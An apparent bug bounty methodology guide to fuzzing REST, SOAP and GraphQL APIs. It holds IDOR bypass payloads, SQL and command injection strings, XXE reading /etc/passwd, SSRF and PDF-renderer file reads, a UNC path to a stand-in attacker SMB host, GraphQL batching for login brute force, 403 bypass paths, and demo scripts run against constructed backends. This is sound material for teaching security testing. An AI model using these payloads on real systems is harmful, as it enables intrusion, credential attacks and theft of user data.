# API Fuzzing for Bug Bounty

## Purpose

Comprehensive techniques for testing REST, SOAP and GraphQL APIs during bug bounty hunting and penetration testing engagements: vulnerability discovery, authentication bypass, IDOR exploitation and API-specific attack vectors.

## Inputs/Prerequisites

- Burp Suite or a similar intercepting proxy
- API wordlists (SecLists, api_wordlist)
- Understanding of the REST, GraphQL and SOAP protocols
- Python for scripting
- Target API endpoints and documentation (if available)

## Outputs/Deliverables

- Identified API vulnerabilities
- IDOR exploitation proofs
- Authentication bypass techniques
- SQL injection points
- Documentation of unauthorized data access

## API Types Overview

| Type | Protocol | Data Format | Structure |
|------|----------|-------------|-----------|
| SOAP | HTTP | XML | Envelope with Header + Body |
| REST | HTTP | JSON / XML / URL-encoded | Defined endpoints, one per resource |
| GraphQL | HTTP | Custom query language, usually carried in JSON | Single endpoint (typically `/graphql`) |

## Core Workflow

### Step 1: API Reconnaissance

Identify the API type and enumerate endpoints:
```bash
# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html

# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite

# Extract paths from a Swagger/OpenAPI document
python3 json2paths.py swagger.json
```
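Step 1 ends by delegating the Swagger-to-path step to json2paths. The script below is an added illustration for this page, not json2paths or any tool from the table at the end: it reads a Swagger 2 or OpenAPI 3 document, handles both base-URL conventions (`basePath` and `servers`), skips non-operation keys such as `parameters`, fills `{param}` placeholders so the output can go straight into a proxy or fuzzer, and keeps the templated paths for the IDOR work in Step 3. The embedded spec is constructed for the demo; pass the real `swagger.json` on the command line.

```python
"""Turn a Swagger 2 / OpenAPI 3 document into a METHOD + path wordlist.
Added example (not json2paths); SAMPLE_SPEC is a constructed stand-in for a real spec."""
import json
import re
import sys

HTTP_METHODS = {"get", "put", "post", "delete", "options", "head", "patch", "trace"}

# Constructed sample covering OpenAPI 3 'servers', path parameters and non-operation keys.
SAMPLE_SPEC = json.loads(r'''
{
  "openapi": "3.0.0",
  "servers": [{"url": "https://target.com/api/v2"}],
  "paths": {
    "/users/{userId}": {
      "parameters": [{"name": "userId", "in": "path"}],
      "get": {"summary": "Fetch a user"},
      "delete": {"summary": "Remove a user", "deprecated": true}
    },
    "/users/{userId}/invoices/{invoiceId}": {"get": {}},
    "/admin/export": {"post": {}}
  }
}
''')


def base_prefix(spec: dict) -> str:
    """Path prefix every route sits under: OpenAPI 3 takes it from the first 'servers'
    entry (path part only), Swagger 2 from 'basePath'. A trailing slash is dropped."""
    servers = spec.get("servers")
    if servers:
        url = servers[0].get("url", "")
        return re.sub(r"^[a-z][a-z0-9+.-]*://[^/]*", "", url).rstrip("/")
    return spec.get("basePath", "").rstrip("/")


def extract_routes(spec: dict, fill: str = "1"):
    """(METHOD, concrete path) for every operation, sorted. '{param}' placeholders are
    replaced by `fill`; keys that are not HTTP methods ('parameters', 'summary', ...) are
    skipped so they do not appear as fake verbs."""
    prefix = base_prefix(spec)
    routes = []
    for path, item in spec.get("paths", {}).items():
        for key in item:
            if key.lower() in HTTP_METHODS:
                concrete = re.sub(r"\{[^}]*\}", fill, prefix + path)
                routes.append((key.upper(), concrete))
    return sorted(routes)


def templates(spec: dict):
    """Paths with their '{param}' placeholders kept: the ones to swap IDs in during Step 3."""
    prefix = base_prefix(spec)
    return sorted(prefix + path for path in spec.get("paths", {}))


if __name__ == "__main__":
    # Usage: python3 extract_routes.py swagger.json  (no argument runs the constructed sample)
    spec = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_SPEC
    for method, path in extract_routes(spec):
        print(method, path)
```

Feed the concrete list to the proxy as a site map seed and keep the templated list beside it: every `{userId}`-style placeholder is a candidate for the ID swaps in Step 3.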
### Step 2: Authentication Testing

```bash
# Test different login paths; each may sit behind different controls
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login
```

- Check rate limiting on the auth endpoints; if there is none, credential brute force is possible.
- Test the mobile and web APIs separately; don't assume they share the same security controls.
### Step 3: IDOR Testing

Insecure Direct Object Reference (IDOR, listed by OWASP as Broken Object Level Authorization) is the most common API vulnerability: the endpoint takes an object identifier from the client and returns the object without checking that the caller is allowed to see it.

```http
# Basic IDOR: swap the identifier for another user's
GET /api/users/1234  →  GET /api/users/1235

# Even if the ID is email-based, try a numeric one
/?user_id=user@mail.com  →  /?user_id=111

# Compare the "current user" route with the explicit-ID route; they often have different checks
/me/orders  vs  /user/654321/orders
```

IDOR bypass techniques, for when the plain swap is rejected:

```
# Wrap the ID in an array
{"id": 111}  →  {"id": [111]}

# Wrap the ID in an object
{"id": 111}  →  {"id": {"id": 111}}

# Send the ID twice in the query string (HTTP parameter pollution)
URL?id=<LEGIT>&id=<VICTIM>

# Wildcard
{"user_id": "*"}

# Parameter pollution in both orders, in the query string and in JSON: the authorization
# layer and the data layer may each keep a different duplicate (first-key-wins vs last-key-wins)
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id": "<legit_id>", "user_id": "<victim_id>"}
```

Always keep two baselines for comparison: the same request with your own ID and the same request without credentials. A 200 whose body matches neither is the candidate worth documenting; a 200 that returns your own data means the injected ID was ignored.
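The following Python is an added example for the bypass list above, not code from the page. `json_body_variants` and `query_variants` generate the payloads for one captured request, `classify` compares a response against the two baselines (own ID, no credentials), and `fake_backend` is a constructed endpoint that authorizes on the first `user_id` in the body but acts on the last one, the parser mismatch the duplicate-key variant exploits. The token, IDs and field names are assumptions for the demo.

```python
"""IDOR variant generator plus a three-way response comparison for one captured request.
Added example, not from the page; fake_backend is a constructed vulnerable endpoint."""
import json
import re
from urllib.parse import urlencode


def json_body_variants(body: dict, key: str, legit, victim):
    """(label, raw JSON text) pairs for the bypasses in Step 3. Bodies are strings rather
    than dicts because json.dumps() cannot emit a duplicate key, which the parameter
    pollution variants need."""
    def with_value(value):
        changed = dict(body)
        changed[key] = value
        return json.dumps(changed)

    other = {k: v for k, v in body.items() if k != key}
    other_fields = [json.dumps(other)[1:-1]] if other else []

    def duplicated(first, second):
        pair = [f"{json.dumps(key)}: {json.dumps(first)}",
                f"{json.dumps(key)}: {json.dumps(second)}"]
        return "{" + ", ".join(other_fields + pair) + "}"

    return [
        ("plain swap", with_value(victim)),
        ("array wrap", with_value([victim])),
        ("object wrap", with_value({key: victim})),
        ("wildcard", with_value("*")),
        # First-key-wins parsers authorize `legit`, last-key-wins parsers act on `victim`.
        ("dup key legit,victim", duplicated(legit, victim)),
        ("dup key victim,legit", duplicated(victim, legit)),
    ]


def query_variants(path: str, key: str, legit, victim):
    """Same idea for a GET parameter: ?id=<victim>, then the key sent twice in both orders."""
    return [
        ("plain swap", f"{path}?{urlencode({key: victim})}"),
        ("dup legit,victim", f"{path}?{urlencode([(key, legit), (key, victim)])}"),
        ("dup victim,legit", f"{path}?{urlencode([(key, victim), (key, legit)])}"),
    ]


def classify(own, unauth, candidate):
    """Each argument is (status, body). `own` is the caller's own object, `unauth` the same
    request without credentials. Only a 2xx whose body matches neither baseline is worth a
    manual look; a body identical to `own` means the server ignored the injected id."""
    status, body = candidate
    if not 200 <= status < 300:
        return "blocked"
    if body == own[1]:
        return "own data (injected id ignored)"
    if body == unauth[1]:
        return "no data"
    return "POSSIBLE IDOR: review body manually"


def fake_backend(raw_json: str, token: str):
    """Constructed vulnerable endpoint: the authorization check reads user_id with a regex
    (first occurrence wins), the data layer re-parses with json (last occurrence wins)."""
    owner = {"tokenA": 111}[token]
    first = re.search(r'"user_id":\s*(\d+)', raw_json)
    if first is None or int(first.group(1)) != owner:
        return (403, '{"error":"forbidden"}')
    data_id = json.loads(raw_json).get("user_id")
    if not isinstance(data_id, int):
        return (400, '{"error":"bad id"}')
    return (200, json.dumps({"user_id": data_id, "email": f"user{data_id}@example.com"}))


def run_demo():
    """Verdict per variant when user 111 (tokenA) targets user 222."""
    own = fake_backend('{"user_id": 111}', "tokenA")
    unauth = (401, '{"error":"unauthenticated"}')   # constructed unauthenticated baseline
    return {label: classify(own, unauth, fake_backend(raw, "tokenA"))
            for label, raw in json_body_variants({"user_id": 111}, "user_id", 111, 222)}


if __name__ == "__main__":
    for label, verdict in run_demo().items():
        print(f"{label:24} {verdict}")
```

Against the constructed backend only the `legit,victim` duplicate-key body gets through: the authorization regex sees 111, the data layer's JSON parser keeps 222. Which order wins is specific to each parser pair, which is why both orders are always sent.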
### Step 4: Injection Testing

SQL injection in JSON values. Boolean-based: append a condition to the value and compare the responses; if a true condition leaves the response unchanged while a false one changes it, the value is reaching a query. Confirm with a time delay. The `#` comment and `sleep()` below are MySQL syntax; use `-- ` and `pg_sleep()` for PostgreSQL, `WAITFOR DELAY` for MSSQL.

```
{"id": "56456"}                  → OK (baseline)
{"id": "56456 AND 1=1#"}         → OK, identical to the baseline
{"id": "56456 AND 1=2#"}         → empty result or error (vulnerable!)
{"id": "56456 AND sleep(15)#"}   → response delayed 15 seconds (confirmed)
```

Command injection:

```bash
# Ruby on Rails: Kernel#open executes the argument as a command when it starts with "|"
?url=|ls

# Linux command injection through a filename parameter
api.url.com/endpoint?name=file.txt;ls%20/
```

XXE injection (declare the external entity in the DOCTYPE, then reference it in the body):

```xml
<?xml version="1.0"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<test>&xxe;</test>
```

SSRF via API (HTML or XML that the server renders, for example in a PDF export; a connection attempt to an internal port shows up as a timing difference or an error):

```html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
```

.NET `Path.Combine` vulnerability: `Path.Combine(path_1, path_2)` returns `path_2` unchanged whenever `path_2` is rooted (drive letter or UNC path), so a download handler that combines a trusted base directory with a user-supplied filename can be pointed outside the base, and a UNC path makes the server connect to an attacker-controlled SMB host:

```
https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
```
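To make the boolean SQL injection test from this step repeatable, the following added script (an illustration for this page, not code from it) drives a `send` callable with the baseline, the `AND 1=1` and the `AND 1=2` probes and classifies the three responses. So that it runs offline, the target is a constructed in-memory SQLite endpoint in two versions: `vulnerable_lookup`, which interpolates the JSON value into SQL the way an injectable target does, and `safe_lookup`, the hardened form that validates the type and binds the value. SQLite takes `-- ` rather than MySQL's `#` as the trailing comment and has no `sleep()`, so only the boolean probes are demonstrated; the schema and row are constructed.

```python
"""Boolean-based SQL injection oracle for a JSON body field, with a constructed SQLite
backend in vulnerable and hardened form. Added example; nothing here is from the page."""
import json
import sqlite3


def boolean_oracle(send, key: str, base_value: str, template: dict, comment: str = "-- "):
    """send(raw_json) -> (status, body). Three requests: baseline, a true and a false
    condition appended to the same value. The page's payloads use MySQL's '#' comment;
    pass comment='#' for MySQL, '-- ' for SQLite/PostgreSQL/MSSQL."""
    def request(value):
        body = dict(template)
        body[key] = value
        return send(json.dumps(body))

    base = request(base_value)
    true_ = request(f"{base_value} AND 1=1{comment}")
    false_ = request(f"{base_value} AND 1=2{comment}")
    if base == true_ and true_ != false_:
        return "boolean-based SQL injection likely"
    if base == true_ == false_:
        return "no signal: suffix ignored (value cast or truncated), try other probes"
    return "not injectable here: the true probe already differs from the baseline"


def vulnerable_lookup(conn, raw_id: str):
    """The bug the oracle detects: the JSON value is pasted into the statement."""
    sql = f"SELECT id, email FROM users WHERE id = {raw_id}"
    try:
        return (200, json.dumps(conn.execute(sql).fetchall()))
    except sqlite3.Error as exc:
        return (500, json.dumps({"error": str(exc)}))


def safe_lookup(conn, raw_id: str):
    """Hardened form: validate the type, then bind the value as data."""
    try:
        user_id = int(raw_id)
    except ValueError:
        return (400, json.dumps({"error": "id must be an integer"}))
    rows = conn.execute("SELECT id, email FROM users WHERE id = ?", (user_id,)).fetchall()
    return (200, json.dumps(rows))


def make_api(lookup):
    """Constructed endpoint: POST {"id": "..."} -> lookup(conn, id)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    conn.execute("INSERT INTO users VALUES (56456, 'victim@example.com')")

    def send(raw_json: str):
        return lookup(conn, str(json.loads(raw_json)["id"]))
    return send


def run_demo():
    """Oracle verdict for both backends, keyed by backend name."""
    return {
        "vulnerable": boolean_oracle(make_api(vulnerable_lookup), "id", "56456", {"id": "56456"}),
        "safe": boolean_oracle(make_api(safe_lookup), "id", "56456", {"id": "56456"}),
    }


if __name__ == "__main__":
    for name, verdict in run_demo().items():
        print(f"{name}: {verdict}")
```

Against a live target, `send` is whatever wraps your proxy or `requests` session; comparing whole response bodies is deliberately strict, so normalise out timestamps or request IDs before comparing if the API echoes them.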
### Step 5: Method Testing

```http
# Test all HTTP methods on the same resource; authorization is often applied per method
GET    /api/v1/users/1
POST   /api/v1/users/1
PUT    /api/v1/users/1
DELETE /api/v1/users/1
PATCH  /api/v1/users/1

# Switch the content type and re-encode the same body; the second parser may lack the first one's validation
Content-Type: application/json  →  application/xml
```

## GraphQL-Specific Testing

### Introspection Query

Fetch the entire backend schema:

```graphql
{
  __schema {
    queryType { name }
    mutationType { name }
    types {
      kind
      name
      description
      fields(includeDeprecated: true) {
        name
        args { name type { name kind } }
      }
    }
  }
}
```

URL-encoded (GET) version:

```
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
```

### GraphQL IDOR
```graphql
# Try accessing other users' objects by ID; introspection tells you which fields exist
query { user(id: "OTHER_USER_ID") { email password creditCard } }
```

### GraphQL SQL/NoSQL Injection

Arguments reach resolvers as strings, so the classic injection payloads apply:

```graphql
mutation { login(input: { email: "test' or 1=1-- ", password: "password" }) { success jwt } }
```

### Rate Limit Bypass (Batching)

A rate limiter that counts HTTP requests sees one request however many logical operations it carries. Aliases let one operation call the same mutation repeatedly (two unaliased calls of the same field with different arguments fail validation), and this works against every server:

```graphql
mutation {
  a: login(input: { email: "a@example.com", password: "password" }) { success jwt }
  b: login(input: { email: "b@example.com", password: "password" }) { success jwt }
  c: login(input: { email: "c@example.com", password: "password" }) { success jwt }
}
```

Where the server supports query batching, a JSON array of operations in one POST body does the same:

```json
[
  {"query": "mutation { login(input: { email: \"a@example.com\", password: \"password\" }) { success jwt } }"},
  {"query": "mutation { login(input: { email: \"b@example.com\", password: \"password\" }) { success jwt } }"},
  {"query": "mutation { login(input: { email: \"c@example.com\", password: \"password\" }) { success jwt } }"}
]
```

### GraphQL DoS (Nested Queries)

Circular relationships in the schema (posts → comments → user → posts ...) let a single query fan out exponentially if the server enforces no depth or complexity limit:

```graphql
query { posts { comments { user { posts { comments { user { posts { ... } } } } } } } }
```
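As an added example, not from the page, the script below builds the aliased batch mutation programmatically and measures the selection-set depth that the nested-query DoS relies on, which is the number a server-side depth limit should be checking. The `login` mutation shape and the `success jwt` selection follow the queries above; the credential list is constructed.

```python
"""Aliased batch mutation (rate-limit bypass) and selection-set depth measurement (the
nested-query DoS). Added example, not from the page; the login mutation and field names
follow the page's queries, the credential list is constructed."""
import json


def gql_literal(value) -> str:
    """Render a Python scalar as a GraphQL literal. JSON string escaping is valid GraphQL
    string escaping, so strings are delegated to json.dumps."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, (int, float)):
        return str(value)
    return json.dumps(str(value))


def alias_batch(operation: str, arg_sets, selection: str) -> str:
    """N logical calls in one HTTP request. Each call gets a distinct alias (a0, a1, ...)
    because the same unaliased field with different arguments cannot appear twice in one
    selection set; the HTTP layer, and so a per-request rate limiter, sees a single POST."""
    calls = []
    for i, args in enumerate(arg_sets):
        rendered = ", ".join(f"{k}: {gql_literal(v)}" for k, v in args.items())
        calls.append(f"a{i}: {operation}(input: {{{rendered}}}) {{ {selection} }}")
    return "mutation { " + " ".join(calls) + " }"


def array_batch(queries) -> str:
    """Alternative transport: a JSON array of operations in one POST body. Needs server-side
    batching support; aliases work on every server."""
    return json.dumps([{"query": q} for q in queries])


def max_depth(query: str) -> int:
    """Deepest selection-set nesting in a query document. Braces inside string literals and
    inside argument lists (input objects) are not selection sets and are skipped, which is
    the distinction a naive 'count the braces' limiter gets wrong."""
    depth = best = parens = 0
    in_string = False
    skip_next = False
    for ch in query:
        if in_string:
            if skip_next:
                skip_next = False
            elif ch == "\\":
                skip_next = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch == "(":
            parens += 1
        elif ch == ")":
            parens -= 1
        elif parens == 0 and ch == "{":
            depth += 1
            best = max(best, depth)
        elif parens == 0 and ch == "}":
            depth -= 1
    return best


def run_demo():
    """Batch for three constructed accounts, plus depths of the batch and of the DoS query."""
    creds = [{"email": f"{u}@example.com", "password": "password"} for u in "abc"]
    batch = alias_batch("login", creds, "success jwt")
    dos = "query { posts { comments { user { posts { comments { user { posts { id } } } } } } } }"
    return {"batch": batch, "batch_depth": max_depth(batch), "dos_depth": max_depth(dos)}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

`max_depth` counts text, not an AST, but it skips braces inside strings and argument objects, so `user(name: "{{{")` still measures as depth 2; a real depth limit belongs in a validation rule on the parsed document, and the same function is a quick way to see how deep a candidate DoS query actually goes before sending it.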
### GraphQL XSS

```
# XSS via the GraphQL endpoint: the argument is reflected in an error message or echoed in the response
http://target.com/graphql?query={user(name:"</script><script>alert('XSS')</script>"){id}}

# URL-encoded form
http://target.com/example?id=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E
```

### GraphQL Tools

| Tool | Purpose |
|------|---------|
| GraphCrawler | Schema discovery |
| graphw00f | Fingerprinting the GraphQL engine |
| clairvoyance | Schema reconstruction when introspection is disabled |
| InQL | Burp extension |
| GraphQLmap | Exploitation |

## Endpoint Bypass Techniques

When a request gets a 403 or 401, try these bypasses:
```
# Original blocked request
/api/v1/users/sensitivedata        → 403

# Bypass attempts: each changes the raw path the access-control layer matches on
# without changing the resource the backend resolves it to
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata
```

The `..;/` form targets servlet containers, which drop the `;`-parameter and then resolve the `..`; since the `..` consumes the segment before it, put a throwaway segment in front (`/api/v1/users/x/..;/sensitivedata`) so the path resolves back to the blocked resource rather than to `/api/v1/sensitivedata`.
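The script below is an added example of why the list above works, not code from the page: the edge matches the raw path, the backend routes on a normalized one, and every bypass lives in the gap between the two. `edge_acl` and `normalize` are constructed stand-ins that combine behaviours seen in real stacks (percent-decoding, `;`-parameter stripping, `..` resolution, whitespace trimming, `.json` format suffixes); they do not model any specific product.

```python
"""Why the 401/403 bypasses above work: the edge matches the raw path, the backend routes on a
normalized one. Added example; edge_acl and normalize are constructed stand-ins that combine
behaviours seen in real stacks, not a model of any specific product."""
from urllib.parse import unquote


def bypass_variants(blocked: str):
    """The page's list for one blocked path. The '..;' form carries a throwaway segment ('x')
    because a servlet container strips ';...' and then lets '..' consume the segment before
    it, which is what brings the path back to the blocked resource."""
    head, _, last = blocked.rpartition("/")
    return [
        blocked + ".json", blocked + "?", blocked + "/", blocked + "??",
        blocked + "%20", blocked + "%09", blocked + "&details",
        f"{head}/x/..;/{last}",
    ]


def normalize(raw_path: str) -> str:
    """Constructed backend routing view of a raw path: drop query-like tails, percent-decode,
    strip ';' path parameters, resolve '.' and '..', trim whitespace and a trailing slash,
    and drop a '.json' format suffix."""
    path = raw_path.split("?", 1)[0].split("&", 1)[0]
    segments = []
    for segment in unquote(path).split("/"):
        segment = segment.split(";", 1)[0].strip()
        if segment in ("", "."):
            continue
        if segment == "..":
            if segments:
                segments.pop()
            continue
        segments.append(segment)
    if segments and segments[-1].endswith(".json"):
        segments[-1] = segments[-1][: -len(".json")]
    return "/" + "/".join(segments)


def edge_acl(raw_path: str, denied, on_normalized: bool = False) -> bool:
    """True if the edge lets the request through. The misconfiguration is the default:
    an exact match on the raw path. on_normalized=True is the fix: decide on the same
    canonical form the backend routes on (or better, enforce in the application itself)."""
    key = normalize(raw_path) if on_normalized else raw_path
    return key not in denied


def find_bypasses(blocked: str, on_normalized: bool = False):
    """Variants that pass the edge and still reach the blocked resource at the backend."""
    denied = {blocked}
    return [v for v in bypass_variants(blocked)
            if edge_acl(v, denied, on_normalized) and normalize(v) == blocked]


if __name__ == "__main__":
    target = "/api/v1/users/sensitivedata"
    print("raw-path ACL   :", find_bypasses(target))
    print("normalized ACL :", find_bypasses(target, on_normalized=True))
```

Against the raw-path rule every one of the eight variants reaches the resource; against the normalized rule none does. On a real target you do not know the backend's normalization, so send all variants and diff the status codes, which is what the list above amounts to.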
## Output Exploitation

### PDF Export Attacks

When an API renders user-controlled HTML into a PDF (invoices, reports), the renderer runs on the server with the server's file and network access:

```html
<iframe src="file:///etc/passwd" height="1000" width="800"></iframe>
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
<img src="https://iplogger.com/yourcode.gif"/>
```

The first payload is the local file read, the next two probe internal ports, and the last only proves that the rendering host fetches external URLs (and reveals its egress IP).

### DoS via Limits

```
# Normal request
/api/news?limit=100

# DoS attempt: an unbounded page size makes the backend load everything
/api/news?limit=9999999999
```

## Common API Vulnerabilities Checklist

| Vulnerability | Description |
|---------------|-------------|
| API Exposure | Unprotected endpoints exposed publicly |
| Misconfigured Caching | Sensitive data cached incorrectly |
| Exposed Tokens | API keys/tokens in responses or URLs |
| JWT Weaknesses | Weak signing key, no expiration, algorithm confusion |
| IDOR / BOLA | Broken Object Level Authorization |
| Undocumented Endpoints | Hidden admin/debug endpoints |
| Different Versions | Security gaps in older API versions |
| Rate Limiting | Missing or bypassable rate limits |
| Race Conditions | TOCTOU vulnerabilities |
| XXE Injection | XML parser exploitation |
| Content Type Issues | Switching between JSON/XML |
| HTTP Method Tampering | GET→DELETE/PUT abuse |

## Quick Reference

| Vulnerability | Test Payload | Risk |
|---------------|--------------|------|
| IDOR | Change the `user_id` parameter | High |
| SQLi | `' OR 1=1--` in JSON | Critical |
| Command Injection | `; ls /` | Critical |
| XXE | DOCTYPE with ENTITY | High |
| SSRF | Internal IP in params | High |
| Rate Limit Bypass | Batch requests | Medium |
| Method Tampering | GET→DELETE | High |

## Tools Reference

| Category | Tool | URL |
|----------|------|-----|
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
| API Security | apicheck | github.com/BBVA/apicheck |
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
| API Toolkit | APIKit | github.com/API-Security/APIKit |
| API Keys | API Guesser | api-guesser.netlify.app |
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
| GraphQL | InQL | github.com/doyensec/inql |
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
| GraphQL | batchql | github.com/assetnote/batchql |
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |

## Constraints

**Must:**

- Test mobile, web and developer APIs separately
- Check all API versions (/v1, /v2, /v3)
- Validate both authenticated and unauthenticated access

**Must not:**

- Assume the same security controls across API versions
- Skip undocumented endpoints
- Ignore rate limiting checks

**Should:**

- Add the `X-Requested-With: XMLHttpRequest` header to look like the frontend
- Check archive.org for historical API endpoints
- Test for race conditions on sensitive operations

## Examples

### Example 1: IDOR Exploitation
```http
# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>

# Modified request (other user's data)
GET /api/v1/invoices/12346
Authorization: Bearer <token>

# Response reveals the other user's invoice data
```

### Example 2: GraphQL Introspection

```bash
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
```

## Troubleshooting

| Issue | Solution |
|-------|----------|
| API returns nothing | Add the `X-Requested-With: XMLHttpRequest` header |
| 401 on all endpoints | Try adding a `?user_id=1` parameter |
| GraphQL introspection disabled | Use clairvoyance to reconstruct the schema |
| Rate limited | Use IP rotation or batch requests |
| Can't find endpoints | Check Swagger, archive.org and the JavaScript files |